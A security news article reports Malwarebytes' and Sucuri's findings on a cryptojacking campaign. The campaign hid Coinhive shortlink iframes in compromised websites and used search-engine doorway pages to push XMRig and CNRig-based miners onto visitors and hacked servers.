A cryptojacking operation that injects legitimate websites with secret Coinhive shortlinks was recently discovered to be part of an even larger malicious infrastructure that redirects innocent site visitors to servers that distribute both web-based and standard cryptominers.
Researchers at Malwarebytes uncovered the larger plot as they investigated hundreds of websites whose various content management systems had been injected with hexadecimal code that turned out to be 1x1 pixel iframes -- invisible to the naked eye. These iframe containing Coinhive shortlinks, a type of hyperlink that, when clicked on, can be monetized by forcing site visitors to solve a number of hashes before reaching the intended destination.
Normally this process would take mere seconds, but by abusing the process in this case, the attackers can make money by having users' devices expend their precious processing power continually solving the hashes. One observed instance required over 3,712,000 solved hashes rather than the standard 1,024, lead malware intelligence analyst Jerome Segura reports in a July 3 company blog post.
Segura credits fellow cybersecurity company Sucuri with exposing this scam back earlier this year. "The miner script is not being directly loaded from your website but rather through the cnhv[.]co website," states Luke Leal, a security analyst at Sucuri, in a May 22 blog post. "It adds what could be viewed as an additional layer of ambiguity and thereby helps it evade detection as some major anti-virus/information security companies do not have it listed as suspicious yet, though many will detect it once the main script coinhive[.]min[.]js is loaded."
But Malwarebytes appears to have further blown the lid off this campaign by detecting yet another arm of this operation -- one that involves appears to be a malicious traffic distribution system that ultimately infects victims with either the coin miner XMRig or a miner based off of CNRig, a CryptoNight CPU Monero miner for Linux machines.
"In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online," Segura writes. "In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners."
Malwarebytes made the connection after noting that the Coinhive key used in the shortlinks scheme was actively used as far back as May 7 for a separate but related redirection mechanism. This mechanism involves backdoor-compromised websites that send unwitting visitors to a malicious server that initiates another redirection, ultimately leading to the Coinhive shortlink.
But additionally, URIs (Uniform Resource Identifiers) associated with this campaign were found to contain SEO-related keywords which were dynamically used to create fake download pages and files. "We confirmed that indeed some Google or Bing searches showed us results that included the list of compromised sites that are acting as 'doorways,' usually to a traffic distribution system or redirector..." writes Segura. "In this case, the doorways are used to trick people into downloading malicious coin miners instead of the file they were looking for."
Malwarebytes found that victims are infected with the XMRig miner; a batch file that is used for persistence and actually launches the miner, and a simple .NET-based downloader. Further investigation also turned up a second, coin miner in the ELF (Executable and Linkable Format) file format, based off of CNRig.
The XMRig miner's public stats page listed around 500 infected machines that had participated in its mining activity. No such state was available for the CNRig-based miner, but Segura notes that the number of hacked servers was much higher.